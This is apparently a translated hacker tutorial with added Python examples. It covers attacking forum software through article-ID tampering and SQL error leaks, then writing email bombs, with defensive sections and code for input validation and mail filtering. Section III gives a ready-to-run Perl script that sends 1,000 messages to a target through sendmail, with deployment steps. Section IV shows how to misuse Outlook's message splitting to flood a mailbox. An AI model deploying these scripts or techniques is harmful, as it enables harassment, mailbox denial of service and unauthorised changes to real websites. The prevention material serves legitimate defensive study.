Source: Legion 8
The attack described in this section lays the groundwork for the next one. Readers should learn more about Perl and about how websites work; ideally, install a web server on your own system and find some free Perl code to debug and study.
I. Attacking free forum software:
The attack described here is very simple. It obtains the forum administrator's password and the right to modify the forum, so steps such as vulnerability scanning and covering one's tracks are not covered. First, the origin of the problem: many websites on the Internet provide a forum or message board. Most of these are written in ASP, PHP, CGI or Perl, and hackers can obtain the same free forum code. By analysing it they can find the "defects in free software" and then attack the forums on the websites that run it.
For example, the article management system of the website http://www.ls1238.com/website had a very serious problem (I have already contacted them about this vulnerability, and it has been fixed). Look at how it is accessed from a browser. When reading an article, the URL is /list.asp?articleid=nnnn: list.asp is evidently the program that displays the article, what follows the ? is its parameter, and nnnn is the article number. When a hacker registers as a member of the tougao (article-submission) site, he gets the right to upload, modify and delete his own articles. He modifies an article through editarticleself.asp?articleid=nnnn, where nnnn should be the code of one of his own articles. But what if the hacker changes the article code?
After changing the article code, he can modify other people's articles! In other words, anyone who has registered for free on the tougao site can modify any article, and can delete any article with delarticleself.asp.
That is one complete attack; it is very simple, isn't it? Problems like this are everywhere on the Internet. Now think further: what if you put something other than a number in nnnn, for example a few letters or punctuation marks? Trying it shows that if a single quote is submitted in place of the number, the system reports an error that includes sensitive information such as the database file name and its physical path on disk. With that, you can download the database directly to your own machine and find the administrator account in it.
In early versions of YukiBBS3000, a single quote in the registration information also produced a "program running error" prompt, corrupted the forum's internal data, and permanently stopped the forum from operating normally.
II. Preventing the attack:
Large portals such as Netease and Sina do better here. They check the article ID so that special characters cannot get through: if a user enters illegal characters, the check catches them, the system reports that the ID number is invalid, rejects the request, and returns an "invalid input character" page.
They are also careful about article modification. On every modification, the system checks the user's identity and whether the article to be modified belongs to the logged-in user; if not, a warning is given. In fact the same problem existed on their sites in the early days, but because the administrators had a strong awareness of network security, the vulnerability was fixed as soon as it was discovered.
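The two defects above (an article ID that is pasted into a query, so a single quote produces a database error, and an edit page that never checks who owns the article) and the two checks the portals apply (ID validation and an ownership check) are shown side by side below. This is an added example, not code from the original article or from any of the sites it names; the article table, its rows and the user names are constructed for the demonstration, and SQLite stands in for whatever database the original ASP pages used.

```python
"""Added example (not from the original article): the article-ID handling the
text describes, in a vulnerable form and a hardened form, backed by an
in-memory SQLite table filled with constructed sample rows."""
import re
import sqlite3

# Constructed sample data: (article id, owner, title).
SAMPLE_ARTICLES = [
    (1001, "alice", "Alice's first post"),
    (1002, "bob", "Bob's post"),
    (1003, "admin", "Forum rules"),
]

# An article ID is a short run of digits and nothing else.
ID_RE = re.compile(r"[0-9]{1,9}")


def make_db():
    """Build the sample article table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, owner TEXT, title TEXT)"
    )
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SAMPLE_ARTICLES)
    return conn


def vulnerable_lookup(conn, articleid):
    """Like the list.asp the text describes: the raw parameter is pasted into
    the SQL text. A single quote breaks the statement, and the database's
    error text (which in the original bug included file name and path) is
    returned to the caller instead of being logged server-side."""
    sql = "SELECT id, owner, title FROM articles WHERE id = " + articleid
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return None, str(exc)


def parse_article_id(raw):
    """Hardened: accept only digits, as the portals in the text do, and reject
    everything else before the database is touched."""
    if not ID_RE.fullmatch(raw):
        return None
    return int(raw)


def safe_lookup(conn, raw):
    """Validated ID plus a parameterised query: the value can never be
    interpreted as SQL, and a bad ID gets a generic message, not DB details."""
    articleid = parse_article_id(raw)
    if articleid is None:
        return None, "invalid input character"
    rows = conn.execute(
        "SELECT id, owner, title FROM articles WHERE id = ?", (articleid,)
    ).fetchall()
    return rows, None


def can_modify(conn, user, raw):
    """The ownership check editarticleself.asp lacked: the logged-in user may
    only modify an article whose owner column matches their own identity."""
    rows, err = safe_lookup(conn, raw)
    if err or not rows:
        return False
    return rows[0][1] == user


if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_lookup(conn, "1001'"))   # database error text leaks
    print(safe_lookup(conn, "1001'"))         # generic rejection
    print(can_modify(conn, "bob", "1001"))    # False: bob does not own 1001
    print(can_modify(conn, "alice", "1001"))  # True
```

The two fixes are independent: validating the ID stops the error disclosure, and the ownership check stops the cross-user edit. A site that does only the first still lets any member edit any article by changing nnnn.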
When writing CGI and Perl programs, you must consider every possible input. File names submitted by users deserve particular care: a special name the program did not anticipate can have serious consequences for the system, because the file name is used to open something. A user-supplied file name may contain path characters such as directory slashes and dots. You expect an ordinary file name (for example report.txt), but what arrives may be /report.txt or ../report.txt, and then any file on the system can be leaked; the consequences are easy to imagine.
When writing CGI and Perl programs, it is best to include a character check such as the following:
if (($file_name =~ /[^a-zA-Z_.]/) || ($file_name =~ /^\./)) {
    # the file name contains invalid characters (anything but letters,
    # underscore and dot, or a leading dot): reject it. Add 0-9 to the
    # class if digits are needed in names.
}
You should also watch for the less-than and greater-than signs, because these two characters delimit tags in HTML documents, and letting them through can have serious consequences for the forum. Aren't there plenty of amateurish chat rooms on the Internet being played with this way? The simple approach is to forbid both characters outright, since all HTML syntax has to sit between them: if the program detects them, it returns an error. The following line of Perl removes both characters:
$user_input =~ s/[<>]//g;
A better choice is to convert the two characters into their HTML entities (special codes that stand for a character without using the character itself). The following code replaces < with &lt; and > with &gt;:
$user_input =~ s/</&lt;/g;
$user_input =~ s/>/&gt;/g;
In real code, replace & with &amp; before these two lines, so that the output is well-formed HTML and the &lt; and &gt; produced here are not themselves re-encoded by a later & replacement.
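The file-name check and the two angle-bracket treatments described above, reproduced as an added example in Python rather than Perl (this is not code from the original article). The sample inputs are constructed; the regular expression keeps the same character class as the article's Perl check.

```python
"""Added example (not from the original article): the two CGI input checks the
text describes, file-name validation and angle-bracket handling, with the
behaviour of the article's Perl one-liners reproduced in Python."""
import html
import re

# Same character class as the article's Perl check: letters, underscore and
# dot, and the name may not begin with a dot. Slashes, backslashes, NUL,
# spaces and ".." at the start are therefore all rejected.
SAFE_NAME_RE = re.compile(r"(?!\.)[A-Za-z_.]+")


def filename_is_safe(name):
    """True only for plain names such as report.txt."""
    return SAFE_NAME_RE.fullmatch(name) is not None


def strip_angle_brackets(text):
    """The article's first approach (s/[<>]//g): delete both characters.
    Simple, but it silently alters legitimate text such as '1 < 2'."""
    return text.replace("<", "").replace(">", "")


def escape_angle_brackets(text):
    """The article's second approach, with '&' encoded first so that the
    '&lt;' and '&gt;' produced here are not re-encoded and the output stays
    well-formed HTML."""
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;"))


def escape_with_stdlib(text):
    """What a practitioner would use today: the standard library escaper,
    which additionally encodes quotes so the value is also safe inside an
    HTML attribute."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    for name in ("report.txt", "/report.txt", "../report.txt", ".htpasswd"):
        print(name, filename_is_safe(name))
    print(strip_angle_brackets("<b>1 < 2</b>"))
    print(escape_angle_brackets("<b>1 < 2</b>"))
    print(escape_with_stdlib('<a href="x">'))
```

The allow-list approach (say what is permitted, reject everything else) is what makes the file-name check sound; a deny-list of known-bad characters would have to enumerate every path separator and every encoding of one.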
III. Writing a simple email bomb:
With Perl you can write an email bomb quickly. This is far better than using someone else's bomb program; at least the learner really "understands" what a hacker does. The environment for this bomb is a web server with CGI permission that provides the sendmail command (you can of course set this up on your own system), and some knowledge of Perl is also needed.
The principle is very simple: the sendmail command is used repeatedly to send a message with the same content to the target. To control the number of messages sent, we declare a counter variable and loop with while(). The source code:
#!/usr/bin/perl
$file = "/usr/lib/sendmail";       # path of the sendmail command on this server
$target = 'someone@target.com';    # single quotes: "@target" would be interpolated as an array
$count = 0;
while ($count < 1000) {
    # pipe the message body into sendmail, addressed to the target
    open(MAIL, "|$file $target") || die "Cannot open $file!";
    print MAIL "Haha, you are under attack\n";
    close(MAIL);
    sleep 3;
    $count++;
}
Do you understand? That is the whole program; simple, isn't it? Because Perl is interpreted, there is nothing to compile: upload the source to the server, set its permissions to 755 or 775, and call it from a browser. The $file and $target variables define the path of the sendmail command and the target address; change them as needed before use. The number in the while condition (1000 here) is how many bomb messages are sent, and $count is the counter. Because the sending is done by the server it is very fast, so this number can be set quite large without the program feeling slow.
IV. Using Outlook to create an email bomb:
Compared with the previous method this one is more direct: instead of a dedicated tool, you only need the Outlook email client. First, the basic principle. Email bombs generally fall into two types. One fills the recipient's quota on the mail server by sending a large volume of mail, so that no further mail can be received; the other endlessly sends small messages with identical content, so that the recipient cannot cope and gives up the mailbox. Implementing either can be called an "email bomb".
Using Outlook as an email bomb uses the second method: continuously sending messages to a specified target. Some preparation is needed first. Apply for a free mailbox and configure the account in Outlook. In the Tools menu select Accounts, select the account you just created, and click Properties on the right of the window. In the Properties window click the Advanced tab and change the message split size in the Sending settings to as small a value as possible (16 is recommended), then exit.
From then on, whenever this mailbox is used to send a message whose size exceeds the configured number of kilobytes, Outlook automatically splits it: a 100 KB message, for example, is sent as roughly seven 16 KB parts, so several messages appear in the recipient's mailbox in place of one, and the bomb effect is achieved!
V. Preventing email bombs:
Email bombs can be guarded against from several angles: taking precautions in advance, using mailboxes carefully from the beginning, and recovering the mailbox as quickly as possible after an attack. Most articles on email bomb prevention talk about Linux and similar systems and rarely address beginners, but most people actually use Windows, and even when the POP3 server runs Linux, hardly anyone collects mail with traditional command-line tools. Here we describe methods closer to the reader's situation.
1. Do not disclose the mailbox address, and prepare several mailboxes:
The best defence is to act early and keep hackers from learning your address in the first place. Disclose your email address as little as possible on the Internet, and do not give it to people you do not know or post it on forums. If you can, apply for several mailboxes, use different ones for different contacts, and keep one public mailbox; then an attack on it does not cause much loss.
2. Use software to clear bomb mail quickly:
With a bomb-cleaning tool such as BombCleaner you can view the list of messages on the server before downloading them, select the junk and delete it remotely. This saves the time of downloading it all and also keeps mail-borne viruses out. The method has an obvious weakness, though: once the mailbox is already full, deleting the bombs comes too late, and important mail sent in the meantime has already been turned away.
3. Set up mailbox filtering:
Mailbox filtering solves what the software above cannot. A filter can be set either in the local mail client or directly in the POP3 mailbox through a browser. The former works like the cleaning software described above: it decides whether a message is spam or a bomb only when mail is being received, so it has no effect once the mailbox is full.
If, however, you can set the filter on the POP3 server itself, the bombs never reach the mailbox. The method is: log in to the server through a browser, enter your mailbox, find the sending and receiving settings, enter the spam sender's address in the filter (several addresses can be separated by semicolons), and save. Bomb mail is then filtered out on the server and the mailbox stays usable, for as long as the attacker keeps using the same sender address: a filter keyed on the address alone is easily evaded by forging a new one.
4. Limit the size of received mail:
What if the hacker sends not hundreds of small messages but a single multi-megabyte bomb? Such a message is not wanted and can fill the mailbox on its own. So when configuring the filter, also look at the "receive mail size" option; we recommend setting it to about one third of the mailbox size. For example, with a 30 MB mailbox, limit each received message to 10 MB; messages larger than that are rejected.
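The server-side filtering described in points 3 and 4, as an added example (not from the original article): a sender filter list and a maximum message size of one third of the 30 MB mailbox from the text. It also adds a third rule that the text's description of the second bomb type suggests but does not give, and which survives a forged sender address better than the list alone: many identical messages from one sender inside a short window are rejected. The blocklist address, the thresholds and the sample messages are all constructed for the demonstration.

```python
"""Added example (not from the original article): a server-side mail filter
with the two rules the text recommends (sender list, size limit) and an
assumed third rule against repeated identical messages, run over constructed
sample traffic."""
import hashlib
from collections import defaultdict, deque

MAILBOX_QUOTA = 30 * 1024 * 1024          # 30 MB mailbox, the text's example
MAX_MESSAGE_SIZE = MAILBOX_QUOTA // 3     # text's rule of thumb: about one third
BLOCKLIST = {"bomber@example.invalid"}    # assumed address entered by the user
REPEAT_LIMIT = 20                         # assumed: identical messages per window
REPEAT_WINDOW = 300                       # assumed: window length in seconds


class BombFilter:
    def __init__(self, blocklist=BLOCKLIST, max_size=MAX_MESSAGE_SIZE,
                 repeat_limit=REPEAT_LIMIT, window=REPEAT_WINDOW):
        self.blocklist = {a.lower() for a in blocklist}
        self.max_size = max_size
        self.repeat_limit = repeat_limit
        self.window = window
        # (sender, hash of body) -> timestamps of recent copies
        self.seen = defaultdict(deque)

    def decide(self, sender, size, body, now):
        """Return "accept", or a reject reason, for one incoming message.
        `now` is the arrival time in seconds."""
        sender = sender.lower()
        # Rule 1 (text, point 3): sender is on the filter list.
        if sender in self.blocklist:
            return "reject: sender on filter list"
        # Rule 2 (text, point 4): a single oversized message.
        if size > self.max_size:
            return "reject: message larger than %d bytes" % self.max_size
        # Rule 3 (assumed): the same body from the same sender, over and over.
        key = (sender, hashlib.sha256(body.encode("utf-8")).hexdigest())
        timestamps = self.seen[key]
        timestamps.append(now)
        while timestamps and now - timestamps[0] > self.window:
            timestamps.popleft()
        if len(timestamps) > self.repeat_limit:
            return "reject: repeated identical message"
        return "accept"


def run_sample():
    """Constructed traffic: one normal message, one oversized one, one from
    the listed sender, then 25 identical small messages three seconds apart,
    the pattern the Perl loop in section III produces."""
    f = BombFilter()
    decisions = [
        f.decide("friend@example.invalid", 2048, "hello", now=0),
        f.decide("friend@example.invalid", 12 * 1024 * 1024, "big attachment", now=1),
        f.decide("bomber@example.invalid", 100, "hello", now=2),
    ]
    for i in range(25):
        decisions.append(f.decide("attacker@example.invalid", 100,
                                  "Haha, you are under attack", now=10 + 3 * i))
    return decisions


if __name__ == "__main__":
    for d in run_sample():
        print(d)
```

With the thresholds above, the first 20 copies of the repeated message are accepted and the rest are rejected; the timestamps are pruned per window, so a sender who pauses longer than the window starts with a clean count again. The repeat rule keys on the message body, so an attacker who varies the body defeats it; it narrows the bomb, it does not replace the other two checks.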